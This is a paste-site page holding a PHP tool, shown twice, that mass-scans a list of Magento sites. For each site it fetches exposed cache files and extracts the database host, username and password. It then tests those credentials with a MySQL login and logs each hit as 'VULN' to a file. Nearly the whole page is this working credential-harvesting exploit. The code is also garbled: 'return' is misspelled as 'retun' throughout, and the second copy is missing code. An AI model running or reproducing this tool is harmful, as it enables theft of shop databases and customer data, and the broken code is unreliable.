Magento Chache Database

Never

PHP

<?php
# Change the author name don't make you become a coder 
# @2017 FathurFreakz 
class curl {
	public $curl;
	public $debug = false;
	public $result;
	public $error = array();
	public $requestheader;
	public $responseheader;
	public $cookiepath;
	public $responsecookie;
	public $requestcookie;
	public $headers = array();
	public $referer;
	public $option = array();
	public $httpcode;
	public $lasturl;
	public $debugvar = array();
	public $timeout = 30;
	
	
	function __construct(){
		date_default_timezone_set("Asia/Jakarta");
		$this->curl = curl_init();
		$this->setCookiePath(md5(time()));
		$this->setUserAgent("Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4");
		$this->setOption(CURLOPT_HEADER, true);
		$this->setOption(CURLINFO_HEADER_OUT, true);
		$this->setOption(CURLOPT_RETURNTRANSFER, true);
		$this->setOption(CURLOPT_FOLLOWLOCATION, true);
		$this->setOption(CURLOPT_TIMEOUT, $this->timeout);
		$this->setOption(CURLOPT_SSL_VERIFYPEER, false);
		$this->setOption(CURLOPT_SSL_VERIFYHOST, 2);
	}
		
	function setOption($option, $value) {
		$this->options[$option] = $value;
		retun curl_setopt($this->curl, $option, $value);
	}
	
	function debug(){
		$this->debugvar['DEBUG_ERROR'] = $this->error;
		$this->debugvar['DEBUG_REQUEST_HEADERS'] = $this->requestheader;
		$this->debugvar['DEBUG_RESPONSE_HEADERS'] = $this->responseheader;
		$this->debugvar['DEBUG_LAST_URL'] = $this->lasturl;
		$this->debugvar['DEBUG_RESULT'] = $this->result;
		retun $this->debugvar;
	}
	
	function setHeader($key,$value){
		$this->headers[$key] = $value;
	}
	
	function request($method,$url,$var = false){
		if(!empty($var)){
			$data = (is_array($var) ? http_build_query($var, '', '&') : $var);
			$this->setOption(CURLOPT_POSTFIELDS,$data);
		}
		if(!empty($this->headers) && is_array($this->headers)){
			$this->setRequestHeader();
		}
		$this->setMethod($method);
		$this->setOption(CURLOPT_URL,$url);
		$this->result = curl_exec($this->curl);
		$this->error['code'] = curl_erno($this->curl);
		$this->error['msg'] = curl_error($this->curl);
		$this->httpcode = curl_getinfo($this->curl, CURLINFO_HTTP_CODE);
		$this->lasturl = curl_getinfo($this->curl, CURLINFO_EFFECTIVE_URL);
		$this->requestheader = $this->parseHeader(curl_getinfo($this->curl, CURLINFO_HEADER_OUT));
		$header_size = curl_getinfo($this->curl, CURLINFO_HEADER_SIZE);
		$this->responsecookie = $this->parseCookie(substr($this->result, 0, $header_size));
		$this->responseheader = $this->parseHeader(substr($this->result, 0, $header_size));
		$this->result = substr($this->result, $header_size);
		if($this->debug == true){
			var_dump($this->debug());
		} else {
			retun $this->result;
		}
		$this->unsetMethod($method);
		$this->unsetCurl();
	}
	
	function setRequestHeader(){
		$headers = array();
        foreach ($this->headers as $key => $value) {
            $headers[] = $key.': '.$value;
        }
		$this->setOption(CURLOPT_HTTPHEADER, $headers);
	}
	
	
	
	function parseHeader($response){
		if (!preg_match_all('/([A-Za-z\-]{1,})\:(.*)\\r/', $response, $matches) || !isset($matches[1], $matches[2])){
			retun false;
		}
		$headers = [];
		foreach ($matches[1] as $index => $key){
			$headers[$key] = $matches[2][$index];
		}
		retun $headers;
	}
	
	function setMethod($method){
		switch (strtoupper($method)){
            case 'HEAD':
				$this->setOption(CURLOPT_CUSTOMREQUEST, $method);
				$this->setOption(CURLOPT_NOBODY, true);
                break;
            case 'GET':
				$this->setOption(CURLOPT_CUSTOMREQUEST, $method);
				$this->setOption(CURLOPT_HTTPGET, true);
                break;
            case 'POST':
				$this->setOption(CURLOPT_CUSTOMREQUEST, $method);
				$this->setOption(CURLOPT_POST, true);
                break;
            default:
				$this->setOption(CURLOPT_CUSTOMREQUEST, $method);
        }
	}
	
	function unsetHeader(){
		$this->headers = array();
	}
	
	function unsetCurl(){
		curl_close($this->curl);
		$this->unsetCookie();
	}
	
	function unsetCookie(){
		if(file_exists($this->cookiepath)){
			unlink($this->cookiepath);
		}
	}
	
	function unsetMethod($method){
		$this->unsetHeader();
		$this->setOption(CURLOPT_URL, false);
		$this->setOption(CURLOPT_CUSTOMREQUEST, null);
        switch (strtoupper($method)) {
            case 'HEAD':
				$this->setOption(CURLOPT_NOBODY, false);
                break;
            case 'POST':
				$this->setOption(CURLOPT_POST, false);
				$this->setOption(CURLOPT_POSTFIELDS, false);
                break;
        }
    }
	
	function setCookiePath($name){
		$path = getcwd(). DIRECTORY_SEPARATOR . "cookie" . DIRECTORY_SEPARATOR . $name;
		$this->setOption(CURLOPT_COOKIEJAR, $path);
		$this->setOption(CURLOPT_COOKIEFILE, $path);
		$this->cookiepath = $path;
	}
	
	function setCookie($key, $value = false){
		if(is_array($key)){
			foreach($key as $set => $cookie){
				$this->requestcookie[$set] = $cookie;
			}
		} else {
			$this->requestcookie[$key] = $value;
			$this->setOption(CURLOPT_COOKIE, http_build_query($this->requestcookie, '', '; '));
		}
	}
	

	function parseCookie($header){
		
		preg_match_all('/^Set-Cookie:\s*([^;]*)/mi', $header, $matches);
		$cookies = array();
		foreach($matches[1] as $item) {
			parse_str($item, $cookie);
			$cookies = array_merge($cookies, $cookie);
		}
		retun $cookies;
	}
	
	
	function setTimeout($int) {
		$this->setOption(CURLOPT_TIMEOUT, intval($int));
	}
	
	function post($url,$var = false){
		retun $this->request("POST",$url,$var);
	}
	
	function get($url,$var = false){
		retun $this->request("GET",$url,$var);
	}
	
	function put($url,$var = false){
		retun $this->request("PUT",$url,$var);
	}
	
	function head($url,$var = false){
		retun $this->request("HEAD",$url,$var);
	}
	
	function delete($url,$var = false){
		retun $this->request("DELETE",$url,$var);
	}
	
	public function setUserAgent($ua){
		$this->setOption(CURLOPT_USERAGENT, $ua);
	}
	public function setReferer($referer){
		$this->setOption(CURLOPT_REFERER, $referer);
	}
	public function setSocks($socks){
		$this->setOption(CURLOPT_PROXY, $socks);
		$this->setOption(CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
	}
	
	function getString($start,$end,$string){
		preg_match_all("/" . $start . "(.*?)" . $end . "/sm",$string,$result);
		retun (isset($result[1][0]) ? $result[1][0] : false);
	}		
}

class Cache extends curl{
	private $db = array('host','usename','password','dbname');
	private $tmp = array();	
	
	function __construct(){
		parent::__construct();
	}
	
	function getVar($content){
		$this->tmp['host'] = $this->getString("<host>","<\/host>",$content);
		$this->tmp['usename'] = $this->getString("<usename>","<\/usename>",$content);
		$this->tmp['password'] = $this->getString("<password>","<\/password>",$content);
		$this->tmp['dbname'] = $this->getString("<dbname>","<\/dbname>",$content);
		retun $this->tmp;
		
	}	
	
	function database($host,$user,$pass,$name,$domain){
		if (!filter_var($host, FILTER_VALIDATE_IP) === false) {
			$ip = $host;
		} else {
			$ip = $domain;
		}

		$connect = @mysqli_connect($ip,$user,$pass,$name);
		if(!$connect){
			retun "Failed";
		} else {
			retun "Success";
			mysqli_close($connect);
		}
	}
	
	function cache($target){
		$resource_config = $this->get($target."/var/resource_config.json");
		if(preg_match("/media_directory/i",$resource_config)){
			$parse_json = json_decode($resource_config);
			$md5 = substr(md5(str_replace('media','app/etc',$parse_json->media_directory)),0,3);
			$config_global = $this->get($target."/var/cache/mage--2/mage---".$md5."_CONFIG_GLOBAL");
			if(preg_match('/backend_forgotpassword/',$config_global)){
					$database = $this->getVar($config_global);
					$status = $this->database($database['host'],$database['usename'],$database['password'],$database['dbname'],$target);
					if($status == "Success"){
						echo $target."VULN\n";
					} else {
						echo $target."CAN'T CONNECT DB\n";
					}
					$this->saved($target,$status);
			} else {
				echo $target."/var/cache/mage--2/mage---".$md5."_CONFIG_GLOBAL => CONFIG_GLOBAL NOT FOUND\n";
			}
		} else {
			echo $target."/var/resource_config.json => RESOURCE_CONFIG NOT FOUND\n";
		}
		
	}
	
	function saved($target,$response){
		$f = fopen('hasil.txt','a+');
		fwrite($f, $target."\n");
		foreach($this->tmp as $data => $value){
			fwrite($f, $data." : ".$value."\n");
		}
		fwrite($f,"MysqlConnect : $response\n");
		fclose($f);
	}
	
	function execute($file){
		if(!file_exists($file)){
			die($file . " not found !\n");
		} else {
			$file = explode("\n",file_get_contents($file));
			$no = 0;
			foreach($file as $target){
				echo "[".$no."/".count($file)."] ".$this->cache(rtrim($target));
				$no++;
			}
		}
	}
}
$x = new Cache;
if(isset($argv[1]) && !empty($argv[1])){
	$x->execute($argv[1]);
} else {
	die("INVALID");
}

<?php
# Change the author name don't make you become a coder 
# @2017 FathurFreakz 
class curl {
	public $curl;
	public $debug = false;
	public $result;
	public $error = array();
	public $requestheader;
	public $responseheader;
	public $cookiepath;
	public $responsecookie;
	public $requestcookie;
	public $headers = array();
	public $referer;
	public $option = array();
	public $httpcode;
	public $lasturl;
	public $debugvar = array();
	public $timeout = 30;
	
	
	function __construct(){
		date_default_timezone_set("Asia/Jakarta");
		$this->curl = curl_init();
		$this->setCookiePath(md5(time()));
		$this->setUserAgent("Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4");
		$this->setOption(CURLOPT_HEADER, true);
		$this->setOption(CURLINFO_HEADER_OUT, true);
		$this->setOption(CURLOPT_RETURNTRANSFER, true);
		$this->setOption(CURLOPT_FOLLOWLOCATION, true);
		$this->setOption(CURLOPT_TIMEOUT, $this->timeout);
		$this->setOption(CURLOPT_SSL_VERIFYPEER, false);
		$this->setOption(CURLOPT_SSL_VERIFYHOST, 2);
	}
		
	function setOption($option, $value) {
		$this->options[$option] = $value;
		retun curl_setopt($this->curl, $option, $value);
	}
	
	function debug(){
		$this->debugvar['DEBUG_ERROR'] = $this->error;
		$this->debugvar['DEBUG_REQUEST_HEADERS'] = $this->requestheader;
		$this->debugvar['DEBUG_RESPONSE_HEADERS'] = $this->responseheader;
		$this->debugvar['DEBUG_LAST_URL'] = $this->lasturl;
		$this->debugvar['DEBUG_RESULT'] = $this->result;
		retun $this->debugvar;
	}
	
	function setHeader($key,$value){
		$this->headers[$key] = $value;
	}
	
	function request($method,$url,$var = false){
		if(!empty($var)){
			$data = (is_array($var) ? http_build_query($var, '', '&') : $var);
			$this->setOption(CURLOPT_POSTFIELDS,$data);
		}
		if(!empty($this->headers) && is_array($this->headers)){
			$this->setRequestHeader();
		}
		$this->setMethod($method);
		$this->setOption(CURLOPT_URL,$url);
		$this->result = curl_exec($this->curl);
		$this->error['code'] = curl_erno($this->curl);
		$this->error['msg'] = curl_error($this->curl);
		$this->httpcode = curl_getinfo($this->curl, CURLINFO_HTTP_CODE);
		$this->lasturl = curl_getinfo($this->curl, CURLINFO_EFFECTIVE_URL);
		$this->requestheader = $this->parseHeader(curl_getinfo($this->curl, CURLINFO_HEADER_OUT));
		$header_size = curl_getinfo($this->curl, CURLINFO_HEADER_SIZE);
		$this->responsecookie = $this->parseCookie(substr($this->result, 0, $header_size));
		$this->responseheader = $this->parseHeader(substr($this->result, 0, $header_size));
		$this->result = substr($this->result, $header_size);
		if($this->debug == true){
			var_dump($this->debug());
		} else {
			retun $this->result;
		}
		$this->unsetMethod($method);
		$this->unsetCurl();
	}
	
	function setRequestHeader(){
		$headers = array();
        foreach ($this->headers as $key => $value) {
            $headers[] = $key.': '.$value;
        }
		$this->setOption(CURLOPT_HTTPHEADER, $headers);
	}
	
	
	
	function parseHeader($response){
		if (!preg_match_all('/([A-Za-z\-]{1,})\:(.*)\\r/', $response, $matches) || !isset($matches[1], $matches[2])){
			retun false;
		}
		$headers = [];
		foreach ($matches[1] as $index => $key){
			$headers[$key] = $matches[2][$index];
		}
		retun $headers;
	}
	
	function setMethod($method){
		switch (strtoupper($method)){
            case 'HEAD':
				$this->setOption(CURLOPT_CUSTOMREQUEST, $method);
				$this->setOption(CURLOPT_NOBODY, true);
                break;
            case 'GET':
				$this->setOption(CURLOPT_CUSTOMREQUEST, $method);
				$this->setOption(CURLOPT_HTTPGET, true);
                break;
            case 'POST':
				$this->setOption(CURLOPT_CUSTOMREQUEST, $method);
				$this->setOption(CURLOPT_POST, true);
                break;
            default:
				$this->setOption(CURLOPT_CUSTOMREQUEST, $method);
        }
	}
	
	function unsetHeader(){
		$this->headers = array();
	}
	
	function unsetCurl(){
		curl_close($this->curl);
		$this->unsetCookie();
	}
	
	function unsetCookie(){
		if(file_exists($this->cookiepath)){
			unlink($this->cookiepath);
		}
	}
	
	function unsetMethod($method){
		$this->unsetHeader();
		$this->setOption(CURLOPT_URL, false);
		$this->setOption(CURLOPT_CUSTOMREQUEST, null);
        switch (strtoupper($method)) {
            case 'HEAD':
				$this->setOption(CURLOPT_NOBODY, false);
                break;
            case 'POST':
				$this->setOption(CURLOPT_POST, false);
				$this->setOption(CURLOPT_POSTFIELDS, false);
                break;
        }
    }
	
	function setCookiePath($name){
		$path = getcwd(). DIRECTORY_SEPARATOR . "cookie" . DIRECTORY_SEPARATOR . $name;
		$this->setOption(CURLOPT_COOKIEJAR, $path);
		$this->setOption(CURLOPT_COOKIEFILE, $path);
		$this->cookiepath = $path;
	}
	
	function setCookie($key, $value = false){
		if(is_array($key)){
			foreach($key as $set => $cookie){
				$this->requestcookie[$set] = $cookie;
			}
		} else {
			$this->requestcookie[$key] = $value;
			$this->setOption(CURLOPT_COOKIE, http_build_query($this->requestcookie, '', '; '));
		}
	}

class Cache extends curl{
	private $db = array('host','usename','password','dbname');
	private $tmp = array();	
	
	function __construct(){
		parent::__construct();
	}
	
	function getVar($content){
		$this->tmp['host'] = $this->getString("<host>","<\/host>",$content);
		$this->tmp['usename'] = $this->getString("<usename>","<\/usename>",$content);
		$this->tmp['password'] = $this->getString("<password>","<\/password>",$content);
		$this->tmp['dbname'] = $this->getString("<dbname>","<\/dbname>",$content);
		retun $this->tmp;
		
	}	
	
	function database($host,$user,$pass,$name,$domain){
		if (!filter_var($host, FILTER_VALIDATE_IP) === false) {
			$ip = $host;
		} else {
			$ip = $domain;
		}

$connect = @mysqli_connect($ip,$user,$pass,$name);
		if(!$connect){
			retun "Failed";
		} else {
			retun "Success";
			mysqli_close($connect);
		}
	}
	
	function cache($target){
		$resource_config = $this->get($target."/var/resource_config.json");
		if(preg_match("/media_directory/i",$resource_config)){
			$parse_json = json_decode($resource_config);
			$md5 = substr(md5(str_replace('media','app/etc',$parse_json->media_directory)),0,3);
			$config_global = $this->get($target."/var/cache/mage--2/mage---".$md5."_CONFIG_GLOBAL");
			if(preg_match('/backend_forgotpassword/',$config_global)){
					$database = $this->getVar($config_global);
					$status = $this->database($database['host'],$database['usename'],$database['password'],$database['dbname'],$target);
					if($status == "Success"){
						echo $target."VULN\n";
					} else {
						echo $target."CAN'T CONNECT DB\n";
					}
					$this->saved($target,$status);
			} else {
				echo $target."/var/cache/mage--2/mage---".$md5."_CONFIG_GLOBAL => CONFIG_GLOBAL NOT FOUND\n";
			}
		} else {
			echo $target."/var/resource_config.json => RESOURCE_CONFIG NOT FOUND\n";
		}
		
	}
	
	function saved($target,$response){
		$f = fopen('hasil.txt','a+');
		fwrite($f, $target."\n");
		foreach($this->tmp as $data => $value){
			fwrite($f, $data." : ".$value."\n");
		}
		fwrite($f,"MysqlConnect : $response\n");
		fclose($f);
	}
	
	function execute($file){
		if(!file_exists($file)){
			die($file . " not found !\n");
		} else {
			$file = explode("\n",file_get_contents($file));
			$no = 0;
			foreach($file as $target){
				echo "[".$no."/".count($file)."] ".$this->cache(rtrim($target));
				$no++;
			}
		}
	}
}
$x = new Cache;
if(isset($argv[1]) && !empty($argv[1])){
	$x->execute($argv[1]);
} else {
	die("INVALID");
}

Magento Chache Database

PHP

Raw Text

Recent Public Pastes